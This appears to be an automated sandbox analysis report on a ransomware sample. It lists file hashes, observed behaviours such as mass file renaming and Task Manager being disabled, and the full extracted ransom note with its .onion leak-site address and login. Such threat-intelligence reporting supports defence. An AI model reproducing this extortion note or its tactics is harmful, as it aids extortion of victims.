General

  • Target

    731797d30d8ff6eaf901e788bd4e6048

  • Size

    108KB

  • Sample

    240124-225daaagg8

  • MD5

    731797d30d8ff6eaf901e788bd4e6048

  • SHA1

    9d38ce8e4c3ca5fbdfdfbed3ec452151041189c0

  • SHA256

    66ed5384220ff3091903e14a54849f824fdd13ac70dc4e0127eb59c1de801fc2

  • SHA512

    ecb89742be1e524d0abf25fcc4d0a5a4df5e3fa357b2179289efe1569da32dd7372226bba955837c84900ec389568db76d70787a141456a3885b71b1e6e8243b

  • SSDEEP

    1536:wjKfwB0Z6geEfm5YHrXXx/R6lsV3zH9/9FUWIQHL2ukcxw14CmV:bfK0ZFfm5Y7BR6lc9FUFQHL2Fcx1t

Score
10/10

Malware Config

Extracted

Path

C:\RESTORE_FILES_INFO.txt

Ransom Note
-------=== Your network has been infected! ===-------
***DO NOT DELETE THIS FILE UNTIL ALL YOUR DATA HAVE BEEN RECOVERED***
All your documents, photos, databases and other important files have been encrypted . You are not able to decrypt it by yourself. But don't worry, we can help you to restore all your files!
The only way to restore your files is to buy our special software. Only we can give you this software and only we can restore your files!
We have also downloaded a lot of private data from your network. If you do not contact as in a 3 days we will post information about your breach on our public news webs http://ft4zr2jzlqoyob7yg4fcpwyt37hox3ajajqnfkdvbfrkjioyunmqnpad.onion and after 7 days the whole downloaded info.
You can get more information on our page, which is located in a Tor hidden network.
How to get to our page
--------------------------------------------------------------------------------
1.Download Tor browser - https://www.torproject.org/
2.Install Tor browser
3.Open link in Tor browser -http://ft4zr2jzlqoyob7yg4fcpwyt37hox3ajajqnfkdvbfrkjioyunmqnpad.onion
4.Use login:Chaddadgroup password: Chaddadgroup
5.Follow the instructions on this page
* DO NOT TRY TO RECOVER FILES YOURSELF!*
* DO NOT MODIFY ENCRYPTED FILES! *
* * * OTHERWISE, YOU MAY LOSE ALL YOUR FILES FOREVER! * * *
Key Identifier: IKbPozlCRxtydMvMou+zd7wkmR/rVUGh/xqiqblieMK3oEcOXDde1xsDV9xs0bbjSDeFKAVUyA916jltF1nbS0E1Zqk0Wlgntr9qd6nz1yOq0JPv1B/g68e/ncTpza5T95cilxoKItD6cYWuP0JYzh/yCvHXM6wOtErlVsect8UPSJyNHyJZdnEs041g9ozRdCo2tAunjAGUZ1c2QW3163iQeDwwHkwi1E/n69ySaS98nUpAWGnd2GNGAOxYBtnNqK47Cn5ot3AK5j1YT2AM32kbvYSy6L0g0J5RNqn/bb5p2UxcFCvVmPgzzMcBiLVx7qZ1nksJmOLu+DWAYdrVxdu1MhUIoKpckBi2dcKELNTjvByo9dZTNRTcW9Xv5+s92AYQErMO17nrdzm3QIjiKF0K5VjYok+GU1Yd5MWI3aW2jVrjCJMhPP10wv+NQvaMwxuzg3BAC6bvka88EEoETvSKjVhKU6PFH/J3Bu3ZuwBWiPCiKdmx8PI8zZwYOaqD3+/qh+XNeAMgBHVrGnQnkSgKdpA/2Is901NWEIGMw/wDwa2ZlobMnpSrrtYiKq030AzshUycfOhWwjGqv/BQLvPBtni1Ea4k1ww05OvhvPrrMU2sUflhr42VEevckSHDTmWtQ8hKON4dv6tIvTfvRlvTQmVlcLp9j/aS67jhExc=
URLs

http://ft4zr2jzlqoyob7yg4fcpwyt37hox3ajajqnfkdvbfrkjioyunmqnpad.onion

Extracted

Path

C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta

Ransom Note
Identical to the note extracted from C:\RESTORE_FILES_INFO.txt above (same text and same Key Identifier).
URLs

http://ft4zr2jzlqoyob7yg4fcpwyt37hox3ajajqnfkdvbfrkjioyunmqnpad.onion

Targets

    • Target

      731797d30d8ff6eaf901e788bd4e6048

    • Size

      108KB

    • MD5

      731797d30d8ff6eaf901e788bd4e6048

    • SHA1

      9d38ce8e4c3ca5fbdfdfbed3ec452151041189c0

    • SHA256

      66ed5384220ff3091903e14a54849f824fdd13ac70dc4e0127eb59c1de801fc2

    • SHA512

      ecb89742be1e524d0abf25fcc4d0a5a4df5e3fa357b2179289efe1569da32dd7372226bba955837c84900ec389568db76d70787a141456a3885b71b1e6e8243b

    • SSDEEP

      1536:wjKfwB0Z6geEfm5YHrXXx/R6lsV3zH9/9FUWIQHL2ukcxw14CmV:bfK0ZFfm5Y7BR6lc9FUFQHL2Fcx1t

    Score
    10/10

    • Renames multiple (126) files with added filename extension

      This suggests ransomware activity of encrypting all the files on the system.

    • Disables Task Manager via registry modification

    • Downloads MZ/PE file

    • Drops startup file

    • Drops desktop.ini file(s)

    • Legitimate hosting services abused for malware hosting/C2

    • Looks up external IP address via web service

      Uses a legitimate IP lookup service to find the infected system's external IP.

MITRE ATT&CK Enterprise v15